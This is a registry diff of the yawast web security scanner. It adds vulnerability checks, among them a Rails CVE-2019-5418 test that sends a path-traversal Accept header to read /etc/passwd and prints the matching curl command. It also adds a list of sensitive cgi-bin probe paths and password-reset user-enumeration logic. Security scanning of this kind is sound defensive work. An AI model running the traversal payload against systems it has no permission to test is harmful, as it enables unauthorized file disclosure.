yawast 0.7.0.beta2 → 0.7.0.beta3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (30) hide show
  1. checksums.yaml +4 -4
  2. data/.rubocop.yml +6 -0
  3. data/CHANGELOG.md +3 -0
  4. data/README.md +5 -1
  5. data/lib/resources/common_file.txt +208 -0
  6. data/lib/scanner/core.rb +3 -2
  7. data/lib/scanner/plugins/applications/cms/generic.rb +11 -1
  8. data/lib/scanner/plugins/applications/framework/rails.rb +39 -0
  9. data/lib/scanner/plugins/applications/generic/password_reset.rb +40 -14
  10. data/lib/scanner/plugins/dns/caa.rb +1 -1
  11. data/lib/scanner/plugins/http/generic.rb +18 -8
  12. data/lib/scanner/plugins/servers/apache.rb +113 -15
  13. data/lib/scanner/plugins/servers/generic.rb +8 -0
  14. data/lib/scanner/plugins/servers/iis.rb +26 -3
  15. data/lib/scanner/plugins/servers/nginx.rb +33 -0
  16. data/lib/scanner/plugins/servers/python.rb +8 -0
  17. data/lib/scanner/plugins/spider/spider.rb +7 -3
  18. data/lib/scanner/vuln_scan.rb +18 -5
  19. data/lib/shared/http.rb +1 -5
  20. data/lib/shared/output.rb +10 -7
  21. data/lib/version.rb +1 -1
  22. data/test/data/dir.txt +9 -0
  23. data/test/data/etc_passwd.txt +16 -0
  24. data/test/data/nginx_status_page.txt +4 -0
  25. data/test/test_app_fw_rails.rb +28 -0
  26. data/test/test_scan_apache.rb +23 -0
  27. data/test/test_scan_nginx.rb +33 -0
  28. data/yawast.gemspec +0 -1
  29. metadata +13 -18
  30. data/test/test_scan_nginx_banner.rb +0 -17
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA1:
3
- metadata.gz: 449a14e8b574b57874cdbb8fff80b11b667b1d81
4
- data.tar.gz: 7a724b743c8d27f5a92b0e477d27adf06e5b837f
3
+ metadata.gz: 7b0bb4cac61cb155a8c1bd6ac9393bfd7191e617
4
+ data.tar.gz: 11d3f67fb4d47496a67021a9802138713d167892
5
5
  SHA512:
6
- metadata.gz: 8e692349d710ad580cb80b027e7bd1da180e954a3dad1f9d4f493802c9c4f4cd5a0909ad2afd62429d6c2c7b61711ef24f3e887262b5fe899dcde3e316feb09f
7
- data.tar.gz: 68f55b6ff5fd2e62d0b608ac3c6afa981f9cd59d69cc2de34878b7e9d60e929232043d022d3549b5a8ad0d3f29a0a22fbdb4e502b6c48b6a0570a6db34da4b3b
6
+ metadata.gz: 36da9932032084faf8641741829ad7df7a2bdfa8be6f7c73ad05e6f3a0cedce7092b59be3dbd935b25ffe4ac3d7b22aaffffb55ba3fd6eba4b0219e12a75241d
7
+ data.tar.gz: a0f36333064f4299d03ba7139fe6fe8821929107730c9b5cdbfe584977be05ee211ffeb3dd1fe1bd33261285015725cc77f77abd99b2c8898fc7e841468140b3
data/.rubocop.yml CHANGED
@@ -27,3 +27,9 @@ Style/RedundantBegin:
27
27
 
28
28
  Style/SafeNavigation:
29
29
  Enabled: false
30
+
31
+ Style/WordArray:
32
+ Enabled: false
33
+
34
+ Style/Next:
35
+ Enabled: false
data/CHANGELOG.md CHANGED
@@ -13,6 +13,9 @@
13
13
  * [#148](https://github.com/adamcaudill/yawast/issues/148) - Added `--vuln_scan` option to enable new vulnerability scanner
14
14
  * [#151](https://github.com/adamcaudill/yawast/issues/151) - User Enumeration via Password Reset Form Timing Differences
15
15
  * [#152](https://github.com/adamcaudill/yawast/issues/152) - Add check for 64bit TLS Cert Serial Numbers
16
+ * [#156](https://github.com/adamcaudill/yawast/issues/156) - Check for Rails CVE-2019-5418
17
+ * [#157](https://github.com/adamcaudill/yawast/issues/157) - Add check for Nginx Status Page
18
+ * [#158](https://github.com/adamcaudill/yawast/issues/158) - Add check for Tomcat RCE CVE-2019-0232
16
19
  * [#130](https://github.com/adamcaudill/yawast/issues/130) - Bug: HSTS Error leads to printing HTML
17
20
  * [#132](https://github.com/adamcaudill/yawast/issues/132) - Bug: Typo in SSL Output
18
21
  * [#142](https://github.com/adamcaudill/yawast/issues/142) - Bug: Error In Collecting DNS Information
data/README.md CHANGED
@@ -53,7 +53,7 @@ The following tests are performed:
53
53
  * *(Generic)* Presence of readme.html
54
54
  * *(Generic)* Presence of CHANGELOG.txt
55
55
  * *(Generic)* Missing cookie flags (Secure, HttpOnly, and SameSite)
56
- * *(Generic)* Search for 14,169 common files (via `--files`) & 21,332 common directories (via `--dir`)
56
+ * *(Generic)* Search for 14,405 common files (via `--files`) & 21,332 common directories (via `--dir`)
57
57
  * *(Apache)* Info Disclosure: Module listing enabled
58
58
  * *(Apache)* Info Disclosure: Server version
59
59
  * *(Apache)* Info Disclosure: OpenSSL module version
@@ -65,7 +65,10 @@ The following tests are performed:
65
65
  * *(Apache Tomcat)* Tomcat Host Manager Weak Password
66
66
  * *(Apache Tomcat)* Tomcat version detection via invalid HTTP verb
67
67
  * *(Apache Tomcat)* Tomcat PUT RCE (CVE-2017-12617)
68
+ * *(Apache Tomcat)* Tomcat Windows RCE (CVE-2019-0232)
68
69
  * *(Apache Struts)* Sample files which may be vulnerable
70
+ * *(Nginx)* Info Disclosure: Server version
71
+ * *(Nginx)* Info Disclosure: Server status
69
72
  * *(IIS)* Info Disclosure: Server version
70
73
  * *(ASP.NET)* Info Disclosure: ASP.NET version
71
74
  * *(ASP.NET)* Info Disclosure: ASP.NET MVC version
@@ -74,6 +77,7 @@ The following tests are performed:
74
77
  * *(ASP.NET)* Debugging Enabled
75
78
  * *(nginx)* Info Disclosure: Server version
76
79
  * *(PHP)* Info Disclosure: PHP version
80
+ * *(Rails)* File Content Disclosure: CVE-2019-5418
77
81
 
78
82
  CMS Detection:
79
83
 
data/lib/resources/common_file.txt CHANGED
@@ -3851,6 +3851,7 @@ bottom.php
3851
3851
  bounce.php
3852
3852
  boutique.html
3853
3853
  boutique.php
3854
+ bower.json
3854
3855
  box.gif
3855
3856
  box.php
3856
3857
  br.asp
@@ -4183,7 +4184,213 @@ cfg.php
4183
4184
  cfgECText.cfm
4184
4185
  cgi-bin.bak
4185
4186
  cgi-bin.old
4187
+ cgi-bin/.access
4188
+ cgi-bin/.htaccess
4189
+ cgi-bin/.htaccess.old
4190
+ cgi-bin/.htaccess.save
4191
+ cgi-bin/.htaccess~
4192
+ cgi-bin/.htpasswd
4193
+ cgi-bin/.passwd
4194
+ cgi-bin/.www_acl
4195
+ cgi-bin/.wwwacl
4196
+ cgi-bin//_vti_bin/fpcount.exe
4197
+ cgi-bin/CGImail.exe
4198
+ cgi-bin/Cgitest.exe
4199
+ cgi-bin/FormMail.cgi
4200
+ cgi-bin/MachineInfo
4201
+ cgi-bin/Pbcgi.exe
4202
+ cgi-bin/Upload.pl
4203
+ cgi-bin/WINDMAIL.EXE
4204
+ cgi-bin/add_ftp.cgi
4205
+ cgi-bin/addbanner.cgi
4206
+ cgi-bin/adduser.cgi
4207
+ cgi-bin/admin.php
4208
+ cgi-bin/admin.pl
4209
+ cgi-bin/adminwww.cgi
4210
+ cgi-bin/af.cgi
4211
+ cgi-bin/aglimpse
4212
+ cgi-bin/aglimpse.cgi
4213
+ cgi-bin/alienform.cgi
4214
+ cgi-bin/amadmin.pl
4215
+ cgi-bin/ans.pl
4216
+ cgi-bin/architext_query.cgi
4186
4217
  cgi-bin/awstats.pl
4218
+ cgi-bin/badmin.cgi
4219
+ cgi-bin/banner.cgi
4220
+ cgi-bin/bannereditor.cgi
4221
+ cgi-bin/bash
4222
+ cgi-bin/bigconf.cgi
4223
+ cgi-bin/book.cgi
4224
+ cgi-bin/build.cgi
4225
+ cgi-bin/cached_feed.cgi
4226
+ cgi-bin/cachemgr.cgi
4227
+ cgi-bin/calendar.php
4228
+ cgi-bin/calendar.pl
4229
+ cgi-bin/cart.pl
4230
+ cgi-bin/cart32.exe
4231
+ cgi-bin/cartmanager.cgi
4232
+ cgi-bin/ccbill-local.cgi
4233
+ cgi-bin/ccbill-local.pl
4234
+ cgi-bin/cfgwiz.exe
4235
+ cgi-bin/cgi-lib.pl
4236
+ cgi-bin/cgi-test.exe
4237
+ cgi-bin/cgimail.exe
4238
+ cgi-bin/cgitest.exe
4239
+ cgi-bin/change-your-password.pl
4240
+ cgi-bin/clickcount.pl
4241
+ cgi-bin/clickresponder.pl
4242
+ cgi-bin/cmd.exe
4243
+ cgi-bin/cmd1.exe
4244
+ cgi-bin/code.php
4245
+ cgi-bin/code.php3
4246
+ cgi-bin/com5.java
4247
+ cgi-bin/com5.pl
4248
+ cgi-bin/commandit.cgi
4249
+ cgi-bin/commerce.cgi
4250
+ cgi-bin/common.php
4251
+ cgi-bin/compatible.cgi
4252
+ cgi-bin/contents.htm
4253
+ cgi-bin/count.cgi
4254
+ cgi-bin/csh
4255
+ cgi-bin/cstat.pl
4256
+ cgi-bin/db_manager.cgi
4257
+ cgi-bin/dbmlparser.exe
4258
+ cgi-bin/diagnose.cgi
4259
+ cgi-bin/dig.cgi
4260
+ cgi-bin/download.cgi
4261
+ cgi-bin/dumpenv.pl
4262
+ cgi-bin/edit.pl
4263
+ cgi-bin/enter.cgi
4264
+ cgi-bin/environ.cgi
4265
+ cgi-bin/environ.pl
4266
+ cgi-bin/finger.pl
4267
+ cgi-bin/flexform.cgi
4268
+ cgi-bin/formmail.cgi
4269
+ cgi-bin/formmail.pl
4270
+ cgi-bin/foxweb.dll
4271
+ cgi-bin/foxweb.exe
4272
+ cgi-bin/fpadmin.htm
4273
+ cgi-bin/fpremadm.exe
4274
+ cgi-bin/fpsrvadm.exe
4275
+ cgi-bin/ftp.pl
4276
+ cgi-bin/ftpsh
4277
+ cgi-bin/generate.cgi
4278
+ cgi-bin/get32.exe
4279
+ cgi-bin/getdoc.cgi
4280
+ cgi-bin/gm.cgi
4281
+ cgi-bin/guestbook.cgi
4282
+ cgi-bin/guestbook.pl
4283
+ cgi-bin/handler.cgi
4284
+ cgi-bin/hello.bat
4285
+ cgi-bin/hitview.cgi
4286
+ cgi-bin/hpnst.exe
4287
+ cgi-bin/htimage.exe
4288
+ cgi-bin/html2chtml.cgi
4289
+ cgi-bin/html2wml.cgi
4290
+ cgi-bin/htsearch.cgi
4291
+ cgi-bin/imagemap
4292
+ cgi-bin/imagemap.exe
4293
+ cgi-bin/index.pl
4294
+ cgi-bin/infosrch.cgi
4295
+ cgi-bin/input.bat
4296
+ cgi-bin/journal.cgi
4297
+ cgi-bin/ksh
4298
+ cgi-bin/listrec.pl
4299
+ cgi-bin/loadpage.cgi
4300
+ cgi-bin/log-reader.cgi
4301
+ cgi-bin/logi.php
4302
+ cgi-bin/login
4303
+ cgi-bin/logit.cgi
4304
+ cgi-bin/logs.pl
4305
+ cgi-bin/mailform.exe
4306
+ cgi-bin/mailit.pl
4307
+ cgi-bin/main.cgi
4308
+ cgi-bin/main_menu.pl
4309
+ cgi-bin/majordomo.pl
4310
+ cgi-bin/man.sh
4311
+ cgi-bin/meta.pl
4312
+ cgi-bin/minimal.exe
4313
+ cgi-bin/mkilog.exe
4314
+ cgi-bin/mkplog.exe
4315
+ cgi-bin/moin.cgi
4316
+ cgi-bin/mrtg.cgi
4317
+ cgi-bin/noshell
4318
+ cgi-bin/nph-error.pl
4319
+ cgi-bin/nph-maillist.pl
4320
+ cgi-bin/pass
4321
+ cgi-bin/passwd
4322
+ cgi-bin/passwd.txt
4323
+ cgi-bin/password
4324
+ cgi-bin/perl
4325
+ cgi-bin/perl.exe
4326
+ cgi-bin/php.ini
4327
+ cgi-bin/post16.exe
4328
+ cgi-bin/post32.exe
4329
+ cgi-bin/post_query
4330
+ cgi-bin/postcards.cgi
4331
+ cgi-bin/ppdscgi.exe
4332
+ cgi-bin/printenv
4333
+ cgi-bin/printenv.pl
4334
+ cgi-bin/processit.pl
4335
+ cgi-bin/profile.cgi
4336
+ cgi-bin/quikstore.cfg
4337
+ cgi-bin/redir.exe
4338
+ cgi-bin/register.cgi
4339
+ cgi-bin/responder.cgi
4340
+ cgi-bin/retrieve_password.pl
4341
+ cgi-bin/rguest.exe
4342
+ cgi-bin/rksh
4343
+ cgi-bin/rmp_query
4344
+ cgi-bin/robpoll.cgi
4345
+ cgi-bin/rsh
4346
+ cgi-bin/search
4347
+ cgi-bin/search.php
4348
+ cgi-bin/sendform.cgi
4349
+ cgi-bin/sendpage.pl
4350
+ cgi-bin/sendtemp.pl
4351
+ cgi-bin/sh
4352
+ cgi-bin/shop.cgi
4353
+ cgi-bin/show.pl
4354
+ cgi-bin/showuser.cgi
4355
+ cgi-bin/shtml.dll
4356
+ cgi-bin/simplestguest.cgi
4357
+ cgi-bin/simplestmail.cgi
4358
+ cgi-bin/stat.pl
4359
+ cgi-bin/stats.pl
4360
+ cgi-bin/stats.prf
4361
+ cgi-bin/statsconfig
4362
+ cgi-bin/statusconfig.pl
4363
+ cgi-bin/statview.pl
4364
+ cgi-bin/store.cgi
4365
+ cgi-bin/survey
4366
+ cgi-bin/survey.cgi
4367
+ cgi-bin/tablebuild.pl
4368
+ cgi-bin/tcsh
4369
+ cgi-bin/test-cgi.bat
4370
+ cgi-bin/test-cgi.exe
4371
+ cgi-bin/test-cgi.tcl
4372
+ cgi-bin/test.bat
4373
+ cgi-bin/test2.pl
4374
+ cgi-bin/textcounter.pl
4375
+ cgi-bin/title.cgi
4376
+ cgi-bin/traffic.cgi
4377
+ cgi-bin/tst.bat
4378
+ cgi-bin/upload.cgi
4379
+ cgi-bin/viewlogs.pl
4380
+ cgi-bin/visadmin.exe
4381
+ cgi-bin/visitor.exe
4382
+ cgi-bin/vote.cgi
4383
+ cgi-bin/wais.pl
4384
+ cgi-bin/wconsole.dll
4385
+ cgi-bin/webfind.exe
4386
+ cgi-bin/webif.cgi
4387
+ cgi-bin/webmap.cgi
4388
+ cgi-bin/webplus.exe
4389
+ cgi-bin/windmail
4390
+ cgi-bin/windmail.exe
4391
+ cgi-bin/wrap.cgi
4392
+ cgi-bin/wwwadmin.pl
4393
+ cgi-bin/zsh
4187
4394
  cgi.bin
4188
4395
  cgi.pl/
4189
4396
  cgu.htm
@@ -6855,6 +7062,7 @@ groupmgr.php
6855
7062
  groupmsg.php
6856
7063
  groups.html
6857
7064
  groups.php
7065
+ gruntfile.js
6858
7066
  gs.php
6859
7067
  gsearch.html
6860
7068
  gsearch.php
data/lib/scanner/core.rb CHANGED
@@ -69,6 +69,7 @@ module Yawast
69
69
 
70
70
  # server specific checks
71
71
  Yawast::Scanner::Plugins::Servers::Apache.check_all(@uri)
72
+ Yawast::Scanner::Plugins::Servers::Nginx.check_all(@uri)
72
73
  Yawast::Scanner::Plugins::Servers::Iis.check_all(@uri, head)
73
74
 
74
75
  Yawast::Scanner::Plugins::Http::FilePresence.check_all @uri, options.files
@@ -77,9 +78,9 @@ module Yawast
77
78
  Yawast::Scanner::Plugins::Http::Generic.check_propfind(@uri)
78
79
  Yawast::Scanner::Plugins::Http::Generic.check_options(@uri)
79
80
  Yawast::Scanner::Plugins::Http::Generic.check_trace(@uri)
80
- end
81
81
 
82
- Yawast::Scanner::Plugins::Spider::Spider.spider(@uri) if options.spider
82
+ Yawast::Scanner::Plugins::Spider::Spider.spider(@uri) if options.spider
83
+ end
83
84
 
84
85
  # check for common directories
85
86
  if options.dir
data/lib/scanner/plugins/applications/cms/generic.rb CHANGED
@@ -10,7 +10,17 @@ module Yawast
10
10
  regex = /<meta name="generator[^>]+content\s*=\s*['"]([^'"]+)['"][^>]*>/
11
11
  match = body.match regex
12
12
 
13
- Yawast::Utilities.puts_info "Meta Generator: #{match[1]}" if match
13
+ if match
14
+ Yawast::Utilities.puts_info "Meta Generator: #{match[1]}"
15
+
16
+ Yawast::Shared::Output.log_hash 'vulnerabilities',
17
+ 'cms_meta_generator_exposed',
18
+ {vulnerable: true, generator: match[1]}
19
+ else
20
+ Yawast::Shared::Output.log_hash 'vulnerabilities',
21
+ 'cms_meta_generator_exposed',
22
+ {vulnerable: false, generator: nil}
23
+ end
14
24
  end
15
25
  end
16
26
  end
data/lib/scanner/plugins/applications/framework/rails.rb ADDED
@@ -0,0 +1,39 @@
1
+ # frozen_string_literal: true
2
+
3
+ module Yawast
4
+ module Scanner
5
+ module Plugins
6
+ module Applications
7
+ module Framework
8
+ class Rails
9
+ def self.check_all(uri, links)
10
+ check_cve_2019_5418 links
11
+ end
12
+
13
+ def self.check_cve_2019_5418(links)
14
+ Yawast::Shared::Output.log_hash 'vulnerabilities',
15
+ 'rails_cve_2019_5418',
16
+ {vulnerable: false, body: nil}
17
+
18
+ links.each do |link|
19
+ # this only applies to controllers, so skip the check unless the link ends with '/'
20
+ next unless link.to_s.end_with? '/'
21
+
22
+ body = Yawast::Shared::Http.get(URI.parse(link), {'Accept' => '../../../../../../../../../etc/passwd{{'})
23
+ if body.include? 'root:'
24
+ Yawast::Utilities.puts_vuln 'Rails CVE-2019-5418: File Content Disclosure'
25
+ Yawast::Utilities.puts_raw "\tcurl -H 'Accept: ../../../../../../../../../etc/passwd{{' #{link}"
26
+
27
+ Yawast::Shared::Output.log_hash 'vulnerabilities',
28
+ 'rails_cve_2019_5418',
29
+ {vulnerable: true, body: body, uri: link}
30
+ break
31
+ end
32
+ end
33
+ end
34
+ end
35
+ end
36
+ end
37
+ end
38
+ end
39
+ end
data/lib/scanner/plugins/applications/generic/password_reset.rb CHANGED
@@ -10,11 +10,7 @@ module Yawast
10
10
  module Generic
11
11
  class PasswordReset
12
12
  def self.setup
13
- @reset_page = if Yawast.options.pass_reset_page.nil?
14
- Yawast::Utilities.prompt 'What is the application password reset page?'
15
- else
16
- Yawast.options.pass_reset_page
17
- end
13
+ @reset_page = Yawast.options.pass_reset_page
18
14
 
19
15
  @valid_user = if Yawast.options.user.nil?
20
16
  Yawast::Utilities.prompt 'What is a valid user?'
@@ -23,6 +19,7 @@ module Yawast
23
19
  end
24
20
 
25
21
  @timing = {true => [], false => []}
22
+ @element_name = nil
26
23
  end
27
24
 
28
25
  def self.check_resp_user_enum
@@ -94,12 +91,12 @@ module Yawast
94
91
  invalid_4: @timing[false][3], invalid_5: @timing[false][4]}
95
92
  end
96
93
  rescue ArgumentError => e
97
- Yawast::Utilities.puts "Unable to find a matching element to perform the User Enumeration via Password Reset Response test (#{e.message})"
94
+ Yawast::Utilities.puts_error "Unable to find a matching element to perform the User Enumeration via Password Reset Response test (#{e.message})"
98
95
  end
99
96
  end
100
97
 
101
98
  def self.fill_form_get_body(uri, user, valid, log_output)
102
- options = Selenium::WebDriver::Chrome::Options.new({args: ['headless']})
99
+ options = Selenium::WebDriver::Chrome::Options.new({args: ['headless', 'incognito']})
103
100
 
104
101
  # if we have a proxy set, use that
105
102
  if !Yawast.options.proxy.nil?
@@ -115,6 +112,18 @@ module Yawast
115
112
  # find the page form element - this is going to be a best effort thing, and may not always be right
116
113
  element = find_user_field driver
117
114
 
115
+ # the element may not actually be visible yet (heavy JS pages)
116
+ # so, we'll go into a loop for a few seconds to see if it'll show up
117
+ counter = 0
118
+ unless element.displayed?
119
+ until element.displayed?
120
+ sleep 0.5
121
+ counter += 1
122
+
123
+ break if counter > 20
124
+ end
125
+ end
126
+
118
127
  element.send_keys user
119
128
 
120
129
  beginning_time = Time.now
@@ -155,22 +164,39 @@ module Yawast
155
164
  element = find_element driver, 'forgetPasswordEmailOrUsername'
156
165
  return element unless element.nil?
157
166
 
167
+ element = find_element driver, 'username'
168
+ return element unless element.nil?
169
+
158
170
  # if we got here, it means that we don't have an element we know about, so we have to prompt
159
- Yawast::Utilities.puts_raw 'Unable to find a known element to enter the user name. Please identify the proper element.'
160
- Yawast::Utilities.puts_raw 'If this element name seems to be common, please request that it be added: https://github.com/adamcaudill/yawast/issues'
161
- element_name = Yawast::Utilities.prompt 'What is the user/email entry element name?'
162
- element = find_element driver, element_name
171
+ if @element_name.nil?
172
+ Yawast::Utilities.puts_raw 'Unable to find a known element to enter the user name. Please identify the proper element.'
173
+ Yawast::Utilities.puts_raw 'If this element name seems to be common, please request that it be added: https://github.com/adamcaudill/yawast/issues'
174
+ @element_name = Yawast::Utilities.prompt 'What is the user/email entry element name?'
175
+ end
176
+ element = find_element driver, @element_name
163
177
  return element unless element.nil?
164
178
 
165
179
  raise ArgumentError, 'No matching element found.'
166
180
  end
167
181
 
168
182
  def self.find_element(driver, name)
183
+ ret = nil
184
+
185
+ # first, check by name
169
186
  begin
170
- return driver.find_element({name: name})
171
- rescue ArgumentError
172
- return nil
187
+ ret = driver.find_element({name: name})
188
+ rescue # rubocop:disable Style/RescueStandardError, Lint/HandleExceptions
189
+ # do nothing
173
190
  end
191
+
192
+ # next, maybe it's id instead of name
193
+ begin
194
+ ret = driver.find_element({id: name})
195
+ rescue # rubocop:disable Style/RescueStandardError, Lint/HandleExceptions
196
+ # do nothing
197
+ end
198
+
199
+ ret
174
200
  end
175
201
  end
176
202
  end